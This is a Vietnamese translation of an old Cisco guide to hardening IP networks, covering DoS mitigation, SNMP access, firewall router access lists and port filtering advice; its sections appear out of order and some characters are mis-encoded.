Trước hết, thật quan trọng khi mỗi người quản trị mạng giúp giảm bớt các hệ thống dùng để thực hiện cuộc tấn công DoS. Đừng để mạng của bạn lŕ điểm khởi đầu của một cuộc tấn công DoS; giữ các host an toàn và loại bỏ các host đă bị nhiễm ra khỏi mạng ngay lập tức. Có một số cơ chế sẵn có trong các router để ngăn cản các kiểu tấn công DoS nŕo đó. Nhiều trong số các cuộc tấn công nảy cần důng các địa chỉ nguồn giả mạo hoặc không hợp lệ. Ví dụ, các địa chỉ không hợp lệ được dủng trong cuộc tấn công kiểu SYN flood để chắc chắn rằng sự bắt tay TCP với host mục tiêu đã hết hạn(times out) và đang đợi trả lời( xem Section 6.3.2). Có một số phương pháp để lọc ra các gói tin có địa chỉ không hợp lệ nŕy. Danh sách điều khiển truy cập là phương tiện dễ dàng nhất có ở mọi router( xem Section 4.3). Việc tìm đường kểu black hole cũng có thể hữu ích và làm việc trên tất cả các router( xem Section 4.4.6). Hầu hết các router của Cisco đều hỗ trợ một công cụ gọi là Unicast Reserve-Path Forwarding Verification dùng bảng tìm đường để phát hiện vŕ loại bỏ các gói tin mang địa chỉ không hợp lệ( xem Section 4.4.7). Bạn phải ghi nhận sự xuất hiện của các gói tin này ở bất cứ đâu có thể, việc ghi nhận lại những vi phạm này có thể giúp xác định được các host đă bị lây nhiễm cần bị loại bỏ ra khỏi mạng. Dĩ nhiên, sự phát hiện dựa vào việc xem xét thường xuyên các bản ghi nhận của router.
Bạn có thể chống lại các cuộc tấn công DoS đơn lẻ mang tính chất cục bộ bằng cách loại bỏ các gói tin mang địa chỉ nguồn không hợp lệ khi chúng đến từ một border router( xem Section 4.3.5). Các địa chỉ nguồn không hợp lệ hay các địa chỉ nguồn không thể těm ra dấu vết khác thường dùng để dấu nguồn gốc thực tế của cuộc tấn công. Đồng thời, các dịch vụ của router hỗ trợ cho các cuộc tấn công hay mở đường cho cuộc tấn công đều phải bị vô hiệu hóa( xem Section 4.2). Một số router và firewall thường đặc biệt hóa các phương tiện để giảm bớt các cuộc tấn công kiểu TCP SYN flood; trong các router của Cisco phương tiện này gọi được gọi là TCP Intercept( xem Section 4.3.3). Trong vài trường hợp, các phương tiện kiểm soát tốc độ các gói tin hay chất lượng dịch vụ của router có thể dùng để bảo vệ các dịch vụ bị nguy kịch khỏi các hậu quả lớn nhất của các cuộc tấn công DoS( xem Section 4.3.6). Các phương tiện của router cũng có thể được bổ sung bằng các sản phẩm chống DoS thương mại cung cấp khả năng phát hiện tấn và lọc tin nghiêm ngặt hơn.
Một border router không thể kiểm soát được kiểu hay toàn bộ khối lượng gói tin gửi qua nó. Sự giảm bớt DoS hết sức cần đến hành động hợp tác "ngược dòng", nghĩ là từ nhà cung cấp quyền truy cập, (có thể) từ nhà cung cấp vận chuyển, nhà cung cấp quyền truy cập vào điểm nguồn, hoặc ngay các nhà quản trị của các host tấn công. Ví dụ, khi các gói tin của một ICMP flood cùng hội tụ tại uplink, các gói tin hợp pháp bị thay bởi các gói tin giả và các gói tin này không còn chịu tác động bởi sự kiểm soát dòng chảy các gói tin. Các kết nối và truyền dữ liệu bị thiếu và cuối cùng bị hết hạn hay bị treo vì chúng không thể tái đồng bộ được. Nếu nhà cung cấp quyền truy cập của bạn thực hiện việc theo dõi các gói tin theo thống kê, họ có thể từng bước khóa lại và lần ra dấu vết của các gói tin có hại này khi cuộc tấn công bắt đầu. Nếu không có loại dịch vụ giám sát này thì mạng đang bị tấn công cần phải nhanh chóng yêu cầu nhà cung cấp dịch vụ truy cập của nó lọc ra các gói tin gây hại.
Không có những phương pháp nào có thể hoàn toàn chống lại được các kiểu tấn công DoS đã biết, và dĩ nhiên sẽ có các kiểu tấn công DoS mới lạ được khám phá trong tương lai. Vẫn là khôn ngoan khi trang bị để đối xử với các kiểu tấn công DoS phổ biến bằng các phương tiện có sẵn. Các router là một phần của giải pháp, nhưng thiết kế cẩn thận, lập kế hoạch đối phó với các trường hợp bất ngờ và sự hợp tác giữa các nhà quản trị mạng cũng là cần thiết.
|
|
|
|
Simple Network Management Protocol (SNMP) Access
SNMP là một phương pháp khác dùng truy cập router. Với SNMP, bạn có thể thu thập thông tin hay cấu hình routers. Thu thập thông tin với thông điệp get-request và get-next-request, cấu hình routers với thông điệp set-request. Mỗi thông điệp SNMP có một community string ( chuỗi công cộng ! ), là 1 password ở dạng cleartext được gửi trong mỗi gói tin giữa trung tâm điều khiển( management station ) và router, nơi có chứa một SNMP agent.
Chuỗi SNMP được dùng để xác nhận các thông tin gửi đi giữa manager và agent. Chỉ khi manager gửi thông điệp với community string đúng thì agent mới trả lời. SNMP agent trên router cho phép bạn thiết lập những community string cho truy cập ở chế độ nonprivileged và privileged. Bạn có thể thiết lập community strings trên router thông qua lệnh cấu hình snmp-server community <string> [RO | RW ] [access-list].
Tuy nhiên, SNMP community strings được gửi ở dạng cleartext. Do đó, bất cứ ai có khả năng lấy đựợc 1 gói tin nào đó có thể sẽ tìm ra chuỗi này, có thể giả mạo người dùng sửa đổi routers qua SNMP. Vì vậy sử dụng lệnh no snmp-server trap-authentication có thể ngăn chặn những kẻ xâm nhập bắt các thông điệp (gửi giữa SNMP managers và agents) để tìm community strings.
Người ta đã cải tiến bảo mật của SNMP version 2 (SNMPv2) , được mô tả trong RFC 1446. SNMPv2 dùng thuật toán MD5 để xác nhận giao tiếp giữa server và agent. MD5 xác nhận tính tương thích của dữ liệu, nguồn gốc cũng như thời gian. Hơn nữa SNMPv2 có thể dùng chuẩn mã hóa dữ liệu DES để mã hóa thông tin.
Chế độ nonprivileged
Dùng từ khóa RO của lệnh snmp-server community để cung cấp truy cập nonprivileged tới routers qua SNMP.
Lệnh cấu hình sau làm agent trong router chỉ cho phép các thông điệp SNMP get-request và get-next-request,
được gửi đi với community string "public" :
snmp-server community pubic RO 1
Bạn có thể chỉ rõ danh sách địa chỉ IP được phép gửi thông điệp tới router bằng tùy chọn access-list với lệnh snmp-server community. Ở ví dụ sau, chỉ hosts 1.1.1.1 và 2.2.2.2 được phép truy cập nonprivileged tới router
qua SNMP:
access-list 1 permit 1.1.1.1
access-list 1 permit 2.2.2.2
snmp-server community public RO 1
Chế độ privileged
Sử dụng từ khóa RW của lệnh snmp-server community để cung cấp truy cập privileged tới router qua SNMP.
Lệnh sau khiến agent trong router chỉ cho phép thông điệp SNMP set-request, được gửi với community string là "private" :
snmp-server community private RW 1
Bạn có thể chỉ rõ danh sách IP được phép gửi thông điệp tới router bằng tùy chọn access-list của lệnh snmp-server community. Ở ví dụ sau , chỉ có hosts 5.5.5.5 và 6.6.6.6 được phép truy cập privileged tới router qua SNMP :
access-list 1 permit 5.5.5.5
access-list 1 permit 6.6.6.6
snmp-server community private RW 1
Điều khiển việc truy cập đến các Servers chứa các file cấu hình
Nếu 1 router thường xuyên download file cấu hình từ một server Trivial File Transfer Protocol (TFTP) hay Maintenance
Operations Protocol (MOP), bất cứ ai có thể truy cập server này cũng có thể thay đổi file cấu hình của router trên server đó.
Communication servers có thể đươc cấu hình để chấp nhận một kết nối LAT ( Local Area Transport).Protocol translator và các translating router có thể chấp nhận kết nối X.29. Sự khác biệt về kiểu truy cập này cần được chú ý khi tạo
một kiến trúc firewall.
Thiết lập kiến trúc firewall của bạn
Một kiến trúc firewall là 1 mô hình tồn tại giữa bạn và thế giới bên ngoài nhằm bảo vệ bạn khỏi những kẻ xâm nhập. Trong phần lớn tình huống, những kẻ xâm nhập được đại diện bởi mạng Internet và hàng ngàn mạng kết nối với nó. Điển hình như một firewall dựa trên nhiều bộ máy khác nhau trong hình 3-1
Hình 3-1 : <không có>
Trong kiến trúc này, một router được nối với Internet (exterior router), buộc mỗi giao tiếp mạng đi vào application gateway (cổng ứng dụng ).
Một router được nối với mạng nội bộ (interior router) chỉ tiếp nhận những gói tin từ cổng ứng dụng.
Cổng ứng dụng thiết lập policies ( chính sách ) đối với từng người dùng và từng ứng dụng. Hệ quả là nó điều khiển được sử phân phát của các dịch vụ cả đến và đi từ mạng nội bộ. Ví dụ, chỉ một số người dùng được phép giao tiếp với Internet, hay chỉ một số ứng dụng được phép thiết lập kết nối với bên ngoài. Nếu chỉ 1 ứng dụng được phép gửi thư, chỉ những gói thư được đi qua router.
Điều khiển lưu thông trong mạng
Phần này sử dụng tình huống minh họa trong hình 3-2 để mô tả việc sử dụng danh sách truy cập ngăn chặn lưu thông dữ liệu đến và đi từ một firewall router và một firewall communication server
Hình 3-2 : <không có>
Trong bài viết này firewall router cho phép kết nối "đến" từ 1 hay nhiều server hay host. Một router được thiết kế hoạt động như 1 firewall là điều ta mong muốn, vì nó định rõ mục đích của router là external gateway và tránh làm phiền các router khác với nhiệm vụ này. Trong tình huống mạng nội bộ cần được cô lập, firewall router sẽ cung
cấp điểm cô lập mà không ảnh hưởng đến phần còn lại của mạng.
Cấu hình một Firewall Router
Trong cấu hình của firewall router dưới đây, subnet 13 của Class B là firewall subnet, trong khi đó subnet 14 cung cấp kết nối Internet qua một nhà cung cấp dịch vụ :
interface ethernet 0
ip address B.B.13.1 255.255.255.0
interface serial 0
ip address B.B.14.1 255.255.255.0
router igrp
network B.B.0.0
Cấu hình đơn giản này không có sự bảo mật và cho phép tất cả mọi lưu thông từ thế giới bên ngoài đến mạng. Để có sự bảo mật với firewall router, sử dụng danh sách truy cập và nhóm truy cập như mô tả dưới đây.
Xác định danh sách truy cập
Danh sách truy cập xác định những lưu thông thực tế sẽ được cho phép hay từ chối, trong khi đó 1 nhóm truy cập áp dụng 1 danh sách truy cập nhất định cho 1 interface. Danh sách truy cập có thể dùng để từ chối kết nối ẩn chứa mối nguy hại về bảo mật và cho phép tất cả các kết nối khác, hoặc cho phép những kết nối chấp nhận được và từ chối tất cả kết nối còn lại. Đối với một firewall, cách thứ 2 là cách an toàn hơn.
Trong bài viết này, email và news đến được cho phép với 1 số hosts, nhưng FTP, Telnet và rlogin chỉ cho phép những host nằm trong firewall subnet.Khoảng IP mở rộng (từ 100 đến 199) và các số cổng TCP hay UDP được dùng để lọc lưu thông .Khi một kết nối sắp được hình thành cho email,Telnet, FTP,... nó sẽ cố mở một dịch vụ ở một cổng xác định. Do đó bạn có thể lọc những kết nối đó bằng cách từ chối các gói tin tìm cách
sử dụng dịch vụ đó. Về danh sách của những dịch vụ và cổng thường gặp, xem phần "Lọc các dịch vụ TCP và UDP" ở phần sau.
Một danh sách truy cập được gọi sau quyết định của router nhưng trước khi gói tin được gửi đến 1 interface.
Chỗ tốt nhất để xác định danh sách truy cập là tạo 1 file chứa các lệnh access-list, đặt file đó trong thư mục TFTP mặc định và nạp file đó vào router.
Server chứa file đó fải chạy TFTP daemon và có kết nối TCP đến firewall router. Trước khi nạp, mọi xác định trước đó của danh sách truy cập này được gỡ bỏ bằng lệnh no access-list 101
Lệnh access-list có thể được dùng để cho phép các gói tin trả về từ những kết nối được thiết lập trước đó. Với từ khóa established, sẽ có sự phù hợp nếu gói TCP chứa acknowledgement (ACK) hay reset(RST) bits set.
access-list 101 permit tcp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 established
Nếu firewall routers nào chia sẻ mạng với 1 nhà cung cấp bên ngoài, bạn sẽ muốn cho phép truy cập từ các host đó tới mạng của bạn. Trong bài viết này, nhà cung cấp bên ngoài có một cổng nối tiếp sử dụng firewall router
Class B địa chỉ (B.B.14.2) là địa chỉ nguồn như sau :
access-list 101 permit ip B.B.14.2 0.0.0.0 0.0.0.0 255.255.255.255
Ví dụ sau minh họa cách từ chối lưu thông từ 1 người dùng cố gắng che giấu một địa chỉ nội bộ của bạn với bên ngoài ( không dùng danh sách truy cập "đầu vào" 9.21 ) :
access-list 101 deny ip B.B.0.0 0.0.255.255 0.0.0.0 255.255.255.255
Lệnh sau cho phép Domain Name System (DNS) và Network Time Protocol (NTP) gửi yêu cầu và trả lời :
access-list 101 permit udp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 eq 53
access-list 101 permit udp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 eq 123
Lệnh sau từ chối cổng Network File Server (NFS) User Datagram Protocol (UDP) :
access-list 101 deny udp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 eq 2049
Lệnh sau từ chối OpenWindows ở cổng 2001 và 2002, từ chối X11 ở cổng 6001 và 6002 :
access-list 101 deny tcp 0.0.0.0 255.255.255.2550.0.0.0 255.255.255.255 eq 6001
access-list 101 deny tcp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 eq 6002
access-list 101 deny tcp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 eq 2001
access-list 101 deny tcp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 eq 2002
Lệnh sau cho phép Telnet đến communication server (B.B.13.2) :
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.13.2 0.0.0.0 eq 23
Lệnh sau cho phép FTP đến host ở subnet 13 :
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.13.100 0.0.0.0 eq 21
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.13.100 0.0.0.0 eq 20
Ở những ví dụ sau, mạng B.B.1.0 nằm trong mạng nội bộ.Các lệnh sau cho phép kết nối TCP và UDP tới các
cổng lớn hơn 1023 với những host hết sức giới hạn. Nhớ đừng để communication servers bộ dịch giao thức
( protocol translator ) nằm trong danh sách này :
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.13.100 0.0.0.0 gt 1023
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.1.100 0.0.0.0 gt 1023
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.1.101 0.0.0.0 gt 1023
access-list 101 permit udp 0.0.0.0 255.255.255.255 B.B.13.100 0.0.0.0 gt 1023
access-list 101 permit udp 0.0.0.0 255.255.255.255 B.B.1.100 0.0.0.0 gt 1023
access-list 101 permit udp 0.0.0.0 255.255.255.255 B.B.1.101 0.0.0.0 gt 1023
Chú ý : chuẩn FTP sử dụng cổng >1023 cho kết nối dữ liệu của nó; do đó, cổng >1023 phải đựợc mở. Chi tiết hơn đọc phần "Cổng File Transfer Protocol (FTP) " ở phía dưới
Lệnh sau cho phép DNS truy cập tới DNS server(s) liệt kê bởi Network Information Center (NIC) :
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.13.100 0.0.0.0 eq 53
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.1.100 0.0.0.0 eq 53
Lệnh sau cho phép SMPT email theo chiều đến với 1 số máy :
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.13.100 0.0.0.0 eq 25
access-list 101 permit tcp 0.0.0.0 255.255.255.255 B.B.1.100 0.0.0.0 eq 25
Lệnh sau cho phép news transfer protocol (NNTP) server của mạng nội bộ nhận kết nối NNTP từ danh sách cho phép :
access-list 101 permit tcp 16.1.0.18 0.0.0.1 B.B.1.100 0.0.0.0 eq 119
access-list 101 permit tcp 128.102.18.32 0.0.0.0 B.B.1.100 0.0.0.0 eq 119
Lệnh sau cho phép Internet control message protocole (ICMP) cho thông điệp báo lỗi :
access-list 101 permit icmp 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255
Mỗi danh sách truy cập có ẩn câu lệnh "từ chối tất cả những thứ khác" ở cuối danh sách để chắc chắn các thuộc tính không được đề cập đến sẽ bị từ chối.
Cổng File Transfer Protocol (FTP)
Hiện nay nhiều site chặn các phiên làm việc TCP từ ngoài vào nhưng cho phép kết nối ra ngoài. Vấn đề ở chỗ chặn kết nối từ ngoài vào sẽ ngăn cản những chương trình FTP client truyền thống, vì những chương trình này dùng lệnh "PORT"
cho server biết chỗ để gửi file. Máy khách mở một kết nối "điều khiển" đến server, nhưng server sau đó sẽ mở một kết nối "dữ liệu" ở một cổng nào đó ( >1023) trên máy khách.
Rất may , còn có 1 cách khác cho phép máy khác mở một socket "dữ liệu" và cho phép bạn có cả firewall và FTP.
Máy khách gửi 1 lệnh PASV đến server, nhận lại một số hiệu cổng cho socket dữ liệu, mở socket dữ liệu trên cổng đó và bắt đầu gửi .
Để thực hiện phương pháp này, chương trình FTP client phải hỗ trợ lệnh PASV. Vấn đề duy nhất với phương pháp này là nó không thực hiện được nếu server chặn luôn kết nối bất kỳ từ ngoài vào
Mã nguồn cho 1 chương trình FPT hoạt động được với firewall có thể nhận được bằng anonymous FTP tại ftp.cisco.com, file /pub/passive-ftp.tar.Z .Đây là phiên bản BSD 4.3 FTP có sửa chữa để hỗ trợ PASV.
Chú ý : Cẩn thận khi cung cấp dịch vụ anonymous FTP. Rất nhiều FTP server có lỗi ở khu vực này.
Áp dụng danh sách truy cập với các Interfaces
Sau khi danh sách truy cập được nạp vào router và lưu trên NVRAM, phải gán nó cho một interface phù hợp.
Trong bài viết này, lưu thông đến từ bên ngoài qua cổng nối tiếp 0 được lọc trước khi được đặt vào subnet 13 (ethernet 0). Do đó lệnh access-group , dùng 1 danh sách truy cập lọc các kết nối đến, phải được gán cho Ethernet 0 như sau :
interface ethernet 0
ip access-group 101
Để điều khiển truy cập Internet từ mạng nội bộ, lập một danh sách truy cập và áp dụng nó với gói tin gửi đi trên cổng nối tiếp 0 của router. Để làm được vậy, những gói tin gửi về từ các hosts sử dụng Telnet hay FTP phải được cho phép truy cập đến firewall subnetwork B.B.13.0
Sàng lọc dịch vụ TCP và UDP
Vài cổng TCP và UDP thường gặp được liệt kê ở bảng 3-3
Bảng 3-3 : Một số cổng và dịch vụ TCP và UDP thường gặp
Dịch vụ Loại cổng Số cổng
FTP-Data TCP 20
FTP-Commands TCP 21
Telnet TCP 23
SMTP-Email TCP 25
TACACS UDP 49
DNS TCP và UDP 53
TFTP UDP 69
finger TCP 79
Sun Remote
Procedure Call(RPC) UDP 111
Network News
Transfer Protocol (NNTP) TCP 119
Network Time
Protocol (NTP) TCP và UDP 123
NeWS TCP 144
Simple Management
Network Protocol (SNMP) UDP 161
SNMP (traps) UDP 162
Border Gateway
Protocol (BGP) TCP 179
rlogin TCP 513
rexec TCP 514
talk TCP và UDP 517
ntalk TCP và UDP 518
Open Windows TCP và UDP 2000
Network File System (NFS) UDP 2049
X11 TCP và UDP 6000
Lời khuyên của CERT
Computer Emergency Response Team (CERT) khuyên nên lọc những dịch vụ trong bảng 3-4
Bảng 3-4 : Lời khuyên của CERT với các dịch vụ TCP, UDP và cổng
Dịch vụ Loại cổng Số cổng
DNS zone transfers TCP 53
TFTP daemon (tftpd) UDP 69
link TCP 87
Sun RPC TCP và UDP 1111
NFS UDP 2049
BSD UNIX các lệnh
bắt đầu bằng r- TCP từ 512 đến 514
line printer daemon (lpd) TCP 515
UNIX-to-UNIX copy
program daemon (uucpd) TCP 540
Open Windows TCP và UDP 2000
X Windows TCP và UDP 6000+
Phần lớn dịch vụ RPC không có số cổng cố định. Bạn nên tìm những cổng có dịch vụ này và chặn lại. Cisco khuyên nên chặn tất cả cổng UDP trừ DNS nếu có thể.
Chú ý : Cisco khuyên bạn nên lọc dịch vụ finger ở cổng 79 để ngăn chặn người ngoài tìm hiểu cấu trúc thư mục của người dùng và tên của host mà người dùng đăng nhập
danh sách truy cập "đầu vào"
Trong Software Release 9.21, Cisco giới thiệu khả năng gán danh sách truy cập "đầu vào" cho 1 interface. Điều này cho phép người quản trị có thể lọc các gói tin trước khi chúng đi qua router. Trong nhiều trường hợp, danh sách truy cập "đầu vào" và danh sách truy cập "đầu ra" đạt được những tính năng như nhau; tuy nhiên, danh sách truy cập "đầu vào" được ưa thích hơn với 1 số người và có thể dùng để ngăn chặn một vài kiểu che giấu địa chỉ trong khi danh sách truy cập "đầu ra" sẽ không cung cấp đủ độ bảo mật.
Hình 3-3 minh họa 1 host đang bị đánh lừa. Ai đó ở bên ngoài đang mạo nhận rằng đến từ mạng 131.108.17.0.Router interface cho rằng gói tin đến từ 131.108.17.0.Để tránh việc này, 1 input access list được áp dụng cho router interface đối với bên ngoài.
Nó sẽ chặn bất cứ gói tin nào từ ngoài vào với địa chỉ nguồn trong mạng nội bộ mà router biết (17.0 và 18.0)
Hình 3-3 : <không có>
Nếu bạn có nhiều mạng nội bộ nối với firewall router và router đang dùng bộ lọc "đầu ra", lưu thông giữa các mạng nội bộ sẽ bị ảnh hưởng bởi bộ lọc. Nếu bộ lọc "đầu vào" chỉ được dùng với router interface với bên ngoài, mạng nội bộ sẽ không bị ảnh hưởng đáng kể.
Chú ý : Nếu 1 địa chỉ sử dụng source routing, nó có thể gửi và nhận thông qua firewall router. Vì lý do này, bạn nên vô hiệu hóa source routing trên router với lệnh no ip source-route
Cấu hình một Firewall Communication Server
Trong bài viết này, firewall communication server có 1 modem ở line 2
interface Ethernet 0
ip address B.B.13.2 255.255.255.0
!
access-list 10 deny B.B.14.0 0.0.0.255
access-list 10 permit B.B.0.0 0.0.255.255
!
access-list 11 deny B.B.13.2 0.0.0.0
access-list 11 permit B.B.0.0 0.0.255.255
!
line 2
login tacacs
location FireWallCS#2
!
access-class 10 in
access-class 11 out
!
modem answer-timeout 60
modem InOut
telnet transparent
terminal-type dialup
flowcontrol hardware
stopbits 1
rxspeed 38400
txspeed 38400
!
tacacs-server host B.B.1.100
tacacs-server host B.B.1.101
tacacs-server extended
!
line vty 0 15
login tacacs
Xác định danh sách truy cập
Trong ví dụ này, số hiệu mạng được dùng để cho phép hay từ chối truy cập;do đó khoảng IP chuẩn được sử dụng (từ 1 đến 99 ). Với những kết nối từ bên ngoài đến modem lines, chỉ những gói tin từ những host trong mạng nội bộ Class B và những gói tin từ các host trong firewall subnetwork được cho phép:
access-list 10 deny B.B.14.0 0.0.0.255
access-list 10 permit B.B.0.0 0.0.255.255
Những kết nối đi chỉ được cho phép đến các hosts trong mạng nội bộ và communication server
access-list 11 deny B.B.13.2 0.0.0.0
access-list 11 permit B.B.0.0 0.0.255.255
Áp dụng danh sách truy cập với các đường kết nối
Áp dụng 1 danh sách truy cập với 1 đường kết nối bằng lệnh access-class. Trong bài viết này, sự hạn chế trong danh sách truy cập 10 được áp dụng cho các kết nối đến với đường kết nối 2, sự hạn chế trong danh sách truy cập 11 được áp dụng cho các kết nối đi với đường kết nối 2
line 2.
access-class 10 in
access-class 11 out
Sử dụng banners để tạo một thông báo
Ta có thể dùng cấu hình banner exec để tạo ra các thông báo, sẽ được hiện trong tất cả các kết nối. Ví dụ, trên một communication server, bạn có thể đưa vào thông điệp sau :
banner exec ^C
If you have problems with the dial-in lines, please
send mail to helpdesk@CorporationX.com.
If you get the message "% Your account is expiring", please send mail with name
and voicemail box to helpdesk@CorporationX.com, and someone will contact you to renew your account.
Unauthorized use of these resources is prohibited.
Bảo vệ những dịch vụ ngoài chuẩn
Có rất nhiều dịch vụ ngoài chuẩn từ Internet. Trong trường hợp của 1 kết nối vào Internet, những dịch vụ này có thể rất tinh vi và phức tạp. Ví dụ của những dịch vụ này là World Wide Web (WWW), Wide Area Information
Service (WAIS), Gopher và Mosaic. Hầu hết những hệ thống này liên quan đến việc cung cấp thông tin cho người dùng theo những cách tổ chức khác nhau, cho phép tim kiếm thông tin một cách có cấu trúc.
Phần lớn những hệ thống này có những giao thức riêng. Một vài trường hợp như Mosaic sử dụng nhiều giao thức để nhận được thông tin. Bạn phải cẩn thận khi thiết kế một danh sách truy cập áp dụng với mỗi dịch vụ. Trong nhiều trường hợp, các danh sách truy cập có liên quan đến nhau vì mối liên quan giữa các dịch vụ.
Tổng kết
Mặc dù bài viết này minh họa cách sử dụng các tính năng ở mức network-layer của Cisco để tăng cường tính bảo mật cho mạng IP, để có được sự bảo mật đúng nghĩa, bạn phải quan tâm đến tất cả hệ thống ở tất cả các mức
Tài liệu tham khảo
Cheswick, B. and Bellovin, S. Firewalls and Internet Security. Addison-Wesley.
Comer, D.E and Stevens, D.L., Internetworking with TCP/IP. Volumes I-III. Englewood Cliffs, New Jersey:
Prentice Hall; 1991-1993.
Curry, D. UNIX System Security—A Guide for Users and System Administrators.
Garfinkel and Spafford. Practical UNIX Security.O'Reilly & Associates.
Quarterman, J. and Carl-Mitchell, S. The Internet Connection, Reading, Massachusetts: Addison-Wesley
Publishing Company; 1994.
Ranum, M. J. Thinking about Firewalls, Trusted Information Systems, Inc.
Stoll, C. The Cuckoo's Egg. Doubleday.
Treese, G. W. and Wolman, A. X through the Firewall and Other Application Relays.
Requests For Comments (RFCs)
RFC 1118. "The Hitchhiker's Guide to the Internet." September 1989.
RFC 1175. "A Bibliography of Internetworking Information." August 1990.
RFC1244. "Site Security Handbook." July 1991.
RFC 1340. "Assigned Numbers." July 1992.
RFC 1446. "Security Protocols for SNMPv2." April 1993.
RFC 1463. "FYI o¬n Introducing the Internet—A Short Bibliography of Introductory Internetworking Readings
for the Network Novice." May 1993.
RFC 1492. "An Access Control Protocol, Sometimes Called TACACS." July 1993.
Internet Directories
Documents at gopher.nist.gov.
The "Computer Underground Digest" in the /pub/cud directory at ftp.eff.org.
Documents in the /dist/internet_security directory at research.att.com.
HVA-Translator Group
|
|
|
|
Tăng cường Bảo mật cho mạng IP
Bảo mật mạng là một vấn đề rất rộng, có thể được xem xét ở mức dữ liệu (nơi mà những vấn đề về trộm gói tin và mã hóa dữ liệu có thể xảy ra), ở mức giao thức, và ở mức ứng dụng.
Ngày càng có nhiều người kết nối Internet và các công ty ngày càng mở rộng mạng,
vấn đề bảo mật cho mạng nội bộ trở nên khó khăn hơn. Công ty phải xác định khu vực
nào của mạng nội bộ cần bảo vệ, tìm cách hạn chế người dùng truy cập tới những khu
vực đó, xác định loại dịch vụ mạng nào cần sàng lọc để ngăn chặn những lỗ
hổng bảo mật.
Cisco Systems cung cấp rất nhiều tính năng ở tầng giao thức (protocol hay network layer) để tăng cường bảo mật cho mạng IP. Những tính năng này bao gồm điều khiển hạn chế truy cập tới routers và servers bằng console port, Telnet, Simple Network Management Protocol (SNMP),
Terminal Access Control System (TACACS), thẻ chứa mã người dùng và danh sách truy cập
Việc thiết lập kiến trúc của một firewal cũng sẽ được nói tới. Bài viết này chỉ nói đến những vấn đề bảo mật ở mức network-layer, nhưng nếu bỏ qua những vấn đề bảo mật ở mức host-level cũng sẽ rất nguy hiểm. Về những biện pháp bảo mật ở host-level bạn hãy xem hướng dẫn về các ứng dụng của bạn, và danh sách liệt kê ở cuối bài viết này.
Tìm hiểu cách tiếp cận của Cisco với vấn đề bảo mật mạng
Khi người ta nói tới bảo mật, họ muốn chắc chắn rằng người dùng chỉ thực hiện được những việc được cho phép, chỉ nhận được những thông tin được cho phép, và không thể gây ra hư hại với dữ liệu, ứng dụng hay hệ điều hành của hệ thống
Từ bảo mật còn bao hàm nghĩa bảo vệ khỏi những tấn công ác ý từ bên ngoài. Bảo mật cũng liên quan đến điều khiển hiệu ứng của các lỗi và sự cố thiết bị. Những gì có thể bảo vệ chống lại những tấn công được tính toán kỹ lưỡng thì cũng ngăn chặn được những rủi ro ngẫu nhiên. Bài viết này cung cấp những việc mà bạn có thể làm để tăng cường bảo mật cho mạng của bạn. Trước khi đi vào chi tiết, sẽ rất có ích nếu bạn hiểu những khái niệm cơ bản không thể thiếu với bất cứ hệ thống nào
 Biết rõ kẻ thù
Ở đây muốn nói tới những kẻ tấn công. Hãy tìm hiểu xem ai muốn vượt qua các biện pháp bảo mật của bạn, xác định động lực thúc đẩy họ. Xác định họ muốn làm gì và những hư hại họ có thể gây ra cho hệ thống của bạn.
Các biện pháp bảo mật không thể ngăn chặn tuyệt đối các hành động không được phép, mà chỉ khiến việc đó trở nên khó khăn hơn. Mục tiêu là khiến sự bảo mật của mạng vượt qua khả năng hay động lực thúc đẩy kẻ tấn công.
Tính toán chi phí
Các biện pháp bảo mật hầu hết đều làm giảm đi sụ tiện lợi. Bảo mật có thể khiến công việc đình trệ và tạo thêm chi phí đào tạo và quản trị. Nó có thể đòi hỏi nhiều tài nguyên quan trọng cũng như những phần cứng chuyên dụng.
Khi thiết kế các biện pháp bảo mật, bạn cần hiểu được chi phí của chúng, so sánh với lợi ích có thể có. Để làm được như vậy bạn phải hiểu chi phí cho bản thân các biện pháp và chi phí cho những lỗ hổng bảo mật có thể có.
Những giả định của bạn
Mỗi hệ thống bảo mật đều có những giả định của nó. Ví dụ, bạn có thể giả sử rằng kẻ tấn công biết ít hơn bạn, rằng họ dùng những phần mềm tiêu chuẩn. Hãy kiểm tra và đánh giá cẩn thận các giả định của bạn. Mỗi giả định chưa được xem xét sẽ là một lỗ hổng bảo mật tiềm ẩn.
Điều khiển các thông tin bí mật
Hầu hết bảo mật là dựa trên các thông tin bí mật, chẳng hạn như password và các khóa mã hóa. Điều quan trọng nhất là hiểu được khu vực bạn cần bảo vệ. Những kiến thức nào sẽ giúp ai đó vượt qua hệ thống của bạn ? Bạn phải bảo vệ cẩn thận với kiến thức đó. Càng nhiều thông tin bí mật, càng khăn cho việc bảo vệ tất cả chúng. Hệ thống bảo mật chỉ nên thiết kế cho một giới hạn nhất định thông tin cần giữ.
Hãy nhớ đến yếu tố con người
Rất nhiều phương pháp bảo mật thất bại vì những người thiết kế không để ý đến việc người dùng nghĩ gì. Ví dụ, do chúng rất khó nhớ, password tạo 1 cách tự động thường thấy được ghi ở mặt dưới bàn phím.Nếu các biện pháp bảo mật gây trở ngại cho việc sử dụng thiết yếu của hệ thống, những biện pháp đó sẽ bị bỏ qua. Để đạt được ý muốn, bạn phải chắc chắn rằng người dùng có thể hoàn thành công việc của họ, bạn phải làm cho họ hiểu được và chấp nhận sự cần thiết của bảo mật.
